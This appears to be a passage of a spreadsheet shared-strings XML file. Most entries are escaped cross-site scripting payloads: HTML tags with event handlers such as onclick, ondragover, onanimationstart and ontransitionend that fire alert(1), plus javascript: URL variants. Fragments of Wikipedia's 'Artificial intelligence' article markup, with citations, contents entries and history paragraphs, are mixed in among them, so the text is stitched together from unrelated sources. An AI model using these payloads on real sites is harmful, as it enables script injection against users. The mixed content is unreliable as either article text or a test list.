    <t>&lt;video onclick="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;form onload=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;s onload=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset id=x tabindex=1 onfocus=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;cite onpointerdown=alert(1)&gt;XSS&lt;/cite&gt;</t>
  </si>
  <si>
    <t>Psychological evidence of sub-symbolic reasoning:</t>
  </si>
  <si>
    <t>&lt;area onmousemove="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;p onbeforepaste="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;sup ondblclick="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;video onpointerdown=alert(1)&gt;XSS&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;area onbeforecut="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Advertising"&gt;Advertising </t>
  </si>
  <si>
    <t>&lt;samp onmousedown="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;frameset onload=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;acronym oncopy="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;picture onmouseout="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;samp id=x tabindex=1 onfocus=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFVinge1993" class="citation journal"&gt;&lt;a href="/wiki/Vernor_Vinge" title="Vernor Vinge"&gt;Vinge, Vernor &lt;/a&gt; (1993). &lt;a rel="nofollow" class="external text" href="http://www-rohan.sdsu.edu/faculty/vinge/misc/singularity.html"&gt;"The Coming Technological Singularity: How to Survive in the Post-Human Era" &lt;/a&gt;. &lt;i&gt;Vision 21: Interdisciplinary Science and Engineering in the Era of Cyberspace &lt;/i&gt;: 11. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/1993vise.nasa...11V"&gt;1993vise.nasa...11V &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Vision+21%3A+Interdisciplinary+Science+and+Engineering+in+the+Era+of+Cyberspace&amp;amp;rft.atitle=The+Coming+Technological+Singularity%3A+How+to+Survive+in+the+Post-Human+Era&amp;amp;rft.pages=11&amp;amp;rft.date=1993&amp;amp;rft_id=info%3Abibcode%2F1993vise.nasa...11V&amp;amp;rft.aulast=Vinge&amp;amp;rft.aufirst=Vernor&amp;amp;rft_id=http%3A%2F%2Fwww-rohan.sdsu.edu%2Ffaculty%2Fvinge%2Fmisc%2Fsingularity.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>"&gt;&lt;iframe src="javascript:alert()"&gt;</t>
  </si>
  <si>
    <t>&lt;p oncut="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;s draggable="true" ondragend="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onblur=alert(1) tabindex=1 id=x&gt;&lt;/figcaption&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;li style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-263"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-263"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2016arXiv160605830C"&gt;2016arXiv160605830C &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2FTRO.2016.2624754"&gt;10.1109/TRO.2016.2624754 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Transactions+on+Robotics&amp;amp;rft.atitle=Past%2C+Present%2C+and+Future+of+Simultaneous+Localization+and+Mapping%3A+Toward+the+Robust-Perception+Age&amp;amp;rft.volume=32&amp;amp;rft.issue=6&amp;amp;rft.pages=1309-1332&amp;amp;rft.date=2016-12&amp;amp;rft_id=info%3Aarxiv%2F1606.05830&amp;amp;rft_id=info%3Adoi%2F10.1109%2FTRO.2016.2624754&amp;amp;rft_id=info%3Abibcode%2F2016arXiv160605830C&amp;amp;rft.aulast=Cadena&amp;amp;rft.aufirst=Cesar&amp;amp;rft.au=Carlone%2C+Luca&amp;amp;rft.au=Carrillo%2C+Henry&amp;amp;rft.au=Latif%2C+Yasir&amp;amp;rft.au=Scaramuzza%2C+Davide&amp;amp;rft.au=Neira%2C+Jose&amp;amp;rft.au=Reid%2C+Ian&amp;amp;rft.au=Leonard%2C+John+J.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;h1 draggable="true" ondragenter="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;meta ondragover=alert(1) contenteditable&gt;drop here&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;meta onpaste="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li draggable="true" ondrag="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;code oncontextmenu="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Roger_Bacon" title="Roger Bacon"&gt;Roger Bacon &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Reinforcement_learning-119"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Reinforcement_learning_119-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;strike id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;track onbeforepaste="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;data draggable="true" ondragend="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Frontiers+in+Artificial+Intelligence+and+Applications&amp;amp;rft.atitle=Extending+the+Soar+cognitive+architecture&amp;amp;rft.volume=171&amp;amp;rft.pages=224&amp;amp;rft.date=2008&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.77.2473&amp;amp;rft.aulast=Laird&amp;amp;rft.aufirst=John&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;title ondrop=alert(1) contenteditable&gt;drop here&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;multicol ondrop=alert(1) contenteditable&gt;drop here&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;del id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onclick="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onkeypress="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;hr onmousemove="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onbeforepaste="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;frameset draggable="true" ondrag="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onkeydown="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Elkan, Charles (1994). "The paradoxical success of fuzzy logic". &lt;i&gt;IEEE Expert &lt;/i&gt;. &lt;b&gt;9 &lt;/b&gt; (4): 3–49. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.100.8402"&gt;10.1.1.100.8402 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;main ondragover=alert(1) contenteditable&gt;drop here&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;251–259 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;li id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHolland1975"&gt;Holland 1975 &lt;/a&gt;, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;frameset ondragover=alert(1) contenteditable&gt;drop here&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;dd onkeyup="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;.. In August 2019, the &lt;a href="/wiki/American_Institute_of_Certified_Public_Accountants" title="American Institute of Certified Public Accountants"&gt;AICPA &lt;/a&gt; introduced AI training course for accounting professionals.&lt;sup id="cite_ref-324" class="reference"&gt;&lt;a href="#cite_note-324"&gt;&amp;#91;313&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Artificial intelligence was founded as an academic discipline in 1955, and in the years since has experienced several waves of optimism,&lt;sup id="cite_ref-Optimism_of_early_AI_9-0" class="reference"&gt;&lt;a href="#cite_note-Optimism_of_early_AI-9"&gt;&amp;#91;9&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-AI_in_the_80s_10-0" class="reference"&gt;&lt;a href="#cite_note-AI_in_the_80s-10"&gt;&amp;#91;10&amp;#93; &lt;/a&gt; &lt;/sup&gt; followed by disappointment and the loss of funding (known as an "&lt;a href="/wiki/AI_winter" title="AI winter"&gt;AI winter &lt;/a&gt;"),&lt;sup id="cite_ref-First_AI_winter_11-0" class="reference"&gt;&lt;a href="#cite_note-First_AI_winter-11"&gt;&amp;#91;11&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Second_AI_winter_12-0" class="reference"&gt;&lt;a href="#cite_note-Second_AI_winter-12"&gt;&amp;#91;12&amp;#93; &lt;/a&gt; &lt;/sup&gt; followed by new approaches, success and renewed funding.&lt;sup id="cite_ref-AI_in_the_80s_10-1" class="reference"&gt;&lt;a href="#cite_note-AI_in_the_80s-10"&gt;&amp;#91;10&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-AI_in_2000s_13-0" class="reference"&gt;&lt;a href="#cite_note-AI_in_2000s-13"&gt;&amp;#91;13&amp;#93; &lt;/a&gt; &lt;/sup&gt; For most of its history, AI research has been divided into subfields that often fail to communicate with each other.&lt;sup id="cite_ref-Fragmentation_of_AI_14-0" class="reference"&gt;&lt;a href="#cite_note-Fragmentation_of_AI-14"&gt;&amp;#91;14&amp;#93; &lt;/a&gt; &lt;/sup&gt; These sub-fields are based on technical considerations, such as particular goals (e.g. "&lt;a href="/wiki/Robotics" title="Robotics"&gt;robotics &lt;/a&gt;" or "&lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;machine learning &lt;/a&gt;"),&lt;sup id="cite_ref-Problems_of_AI_15-0" class="reference"&gt;&lt;a href="#cite_note-Problems_of_AI-15"&gt;&amp;#91;15&amp;#93; &lt;/a&gt; &lt;/sup&gt; the use of particular tools ("&lt;a href="/wiki/Logic" title="Logic"&gt;logic &lt;/a&gt;" or &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural networks &lt;/a&gt;), or deep philosophical differences.&lt;sup id="cite_ref-Biological_intelligence_vs._intelligence_in_general_16-0" class="reference"&gt;&lt;a href="#cite_note-Biological_intelligence_vs._intelligence_in_general-16"&gt;&amp;#91;16&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Neats_vs._scruffies_17-0" class="reference"&gt;&lt;a href="#cite_note-Neats_vs._scruffies-17"&gt;&amp;#91;17&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Symbolic_vs._sub-symbolic_18-0" class="reference"&gt;&lt;a href="#cite_note-Symbolic_vs._sub-symbolic-18"&gt;&amp;#91;18&amp;#93; &lt;/a&gt; &lt;/sup&gt; Subfields have also been based on social factors (particular institutions or the work of particular researchers).&lt;sup id="cite_ref-Fragmentation_of_AI_14-1" class="reference"&gt;&lt;a href="#cite_note-Fragmentation_of_AI-14"&gt;&amp;#91;14&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=68" title="Edit section: Economics"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;datalist id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>'print "&lt;IMG SRC=java\0script:alert(\"\")&gt;";' &gt;</t>
  </si>
  <si>
    <t>&lt;multicol onmouseenter="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Healthcare"&gt;Healthcare </t>
  </si>
  <si>
    <t xml:space="preserve">     &lt;/div&gt;   </t>
  </si>
  <si>
    <t>&lt;basefont onpointerdown=alert(1)&gt;XSS&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;command oncut="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;section style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The field of AI research was born at &lt;a href="/wiki/Dartmouth_workshop" title="Dartmouth workshop"&gt;a workshop &lt;/a&gt; at &lt;a href="/wiki/Dartmouth_College" title="Dartmouth College"&gt;Dartmouth College &lt;/a&gt; in 1956,&lt;sup id="cite_ref-Dartmouth_conference_31-0" class="reference"&gt;&lt;a href="#cite_note-Dartmouth_conference-31"&gt;&amp;#91;31&amp;#93; &lt;/a&gt; &lt;/sup&gt; where the term "Artificial Intelligence" was coined by &lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;John McCarthy &lt;/a&gt; to distinguish the field from cybernetics and escape the influence of the cyberneticist &lt;a href="/wiki/Norbert_Wiener" title="Norbert Wiener"&gt;Norbert Wiener &lt;/a&gt;.&lt;sup id="cite_ref-32" class="reference"&gt;&lt;a href="#cite_note-32"&gt;&amp;#91;32&amp;#93; &lt;/a&gt; &lt;/sup&gt; Attendees &lt;a href="/wiki/Allen_Newell" title="Allen Newell"&gt;Allen Newell &lt;/a&gt; (&lt;a href="/wiki/Carnegie_Mellon_University" title="Carnegie Mellon University"&gt;CMU &lt;/a&gt;), &lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Herbert Simon &lt;/a&gt; (CMU), John McCarthy (&lt;a href="/wiki/Massachusetts_Institute_of_Technology" title="Massachusetts Institute of Technology"&gt;MIT &lt;/a&gt;), &lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Marvin Minsky &lt;/a&gt; (MIT) and &lt;a href="/wiki/Arthur_Samuel" title="Arthur Samuel"&gt;Arthur Samuel &lt;/a&gt; (&lt;a href="/wiki/IBM" title="IBM"&gt;IBM &lt;/a&gt;) became the founders and leaders of AI research.&lt;sup id="cite_ref-Hegemony_of_the_Dartmouth_conference_attendees_33-0" class="reference"&gt;&lt;a href="#cite_note-Hegemony_of_the_Dartmouth_conference_attendees-33"&gt;&amp;#91;33&amp;#93; &lt;/a&gt; &lt;/sup&gt; They and their students produced programs that the press described as "astonishing":&lt;sup id="cite_ref-FOOTNOTERussellNorvig200318_34-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig200318-34"&gt;&amp;#91;34&amp;#93; &lt;/a&gt; &lt;/sup&gt; computers were learning &lt;a href="/wiki/Draughts" title="Draughts"&gt;checkers &lt;/a&gt; strategies (c. 1954)&lt;sup id="cite_ref-35" class="reference"&gt;&lt;a href="#cite_note-35"&gt;&amp;#91;35&amp;#93; &lt;/a&gt; &lt;/sup&gt; (and by 1959 were reportedly playing better than the average human),&lt;sup id="cite_ref-36" class="reference"&gt;&lt;a href="#cite_note-36"&gt;&amp;#91;36&amp;#93; &lt;/a&gt; &lt;/sup&gt; solving word problems in algebra, proving &lt;a href="/wiki/Theorem" title="Theorem"&gt;logical theorems &lt;/a&gt; (&lt;a href="/wiki/Logic_Theorist" title="Logic Theorist"&gt;Logic Theorist &lt;/a&gt;, first run c. 1956) and speaking English.&lt;sup id="cite_ref-Golden_years_of_AI_37-0" class="reference"&gt;&lt;a href="#cite_note-Golden_years_of_AI-37"&gt;&amp;#91;37&amp;#93; &lt;/a&gt; &lt;/sup&gt; By the middle of the 1960s, research in the U.S. was heavily funded by the &lt;a href="/wiki/DARPA" title="DARPA"&gt;Department of Defense &lt;/a&gt;&lt;sup id="cite_ref-AI_funding_in_the_60s_38-0" class="reference"&gt;&lt;a href="#cite_note-AI_funding_in_the_60s-38"&gt;&amp;#91;38&amp;#93; &lt;/a&gt; &lt;/sup&gt; and laboratories had been established around the world.&lt;sup id="cite_ref-AI_in_England_39-0" class="reference"&gt;&lt;a href="#cite_note-AI_in_England-39"&gt;&amp;#91;39&amp;#93; &lt;/a&gt; &lt;/sup&gt; AI's founders were optimistic about the future: &lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Herbert Simon &lt;/a&gt; predicted, "machines will be capable, within twenty years, of doing any work a man can do". &lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Marvin Minsky &lt;/a&gt; agreed, writing, "within a generation&amp;#160;... the problem of creating 'artificial intelligence' will substantially be solved".&lt;sup id="cite_ref-Optimism_of_early_AI_9-1" class="reference"&gt;&lt;a href="#cite_note-Optimism_of_early_AI-9"&gt; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;head onmouseenter="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;image href=validimage.png onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;bdi id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;audio oncopy="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;li draggable="true" ondragenter="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpointerup=alert(1)&gt;XSS&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;img onkeypress="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;center onpointerup=alert(1)&gt;XSS&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;sup ondragover=alert(1) contenteditable&gt;drop here&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="toctitle" lang="en" dir="ltr"&gt;&lt;h2 id="mw-toc-heading"&gt;Contents &lt;/h2&gt;&lt;span class="toctogglespan"&gt;&lt;label class="toctogglelabel" for="toctogglecheckbox"&gt; &lt;/label&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-32"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-32"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dfn onkeydown="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rb style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;bgsound id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;param onpointermove=alert(1)&gt;XSS&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/bgsound&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Planning_as_search-187"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Planning_as_search_187-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;body id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;small style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Cybersecurity </t>
  </si>
  <si>
    <t>&lt;source oncopy="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;sub onclick="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Symbolic_AI" class="mw-redirect" title="Symbolic AI"&gt;Symbolic AI &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;u onpointerdown=alert(1)&gt;XSS&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;br ondrop=alert(1) contenteditable&gt;drop here&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=33" title="Edit section: Deep recurrent neural networks"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;em onpointerleave=alert(1)&gt;XSS&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/K._Eric_Drexler" title="K. Eric Drexler"&gt;Eric Drexler &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meta ondblclick="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;dl onpointerover=alert(1)&gt;XSS&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;25 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;audio draggable="true" ondragleave="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;source onkeyup="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;menu style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onmouseout="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;source onbeforecopy="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=siemens.com&amp;amp;rft.atitle=Autonomous+Systems%3A+Infographic&amp;amp;rft_id=https%3A%2F%2Fwww.siemens.com%2Finnovation%2Fen%2Fhome%2Fpictures-of-the-future%2Fdigitalization-and-software%2Fautonomous-systems-infographic.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style onreadystatechange=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;a href="/wiki/Agent_architecture" title="Agent architecture"&gt;Agent architectures &lt;/a&gt; and &lt;a href="/wiki/Cognitive_architecture" title="Cognitive architecture"&gt;cognitive architectures &lt;/a&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;center ondragover=alert(1) contenteditable&gt;drop here&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;739–748, 758 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-65"&gt;&lt;a href="#Superintelligence"&gt;&lt;span class="tocnumber"&gt;8.5 </t>
  </si>
  <si>
    <t>&lt;embed onbeforecut="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;949 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;main id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;wbr id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpaste="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
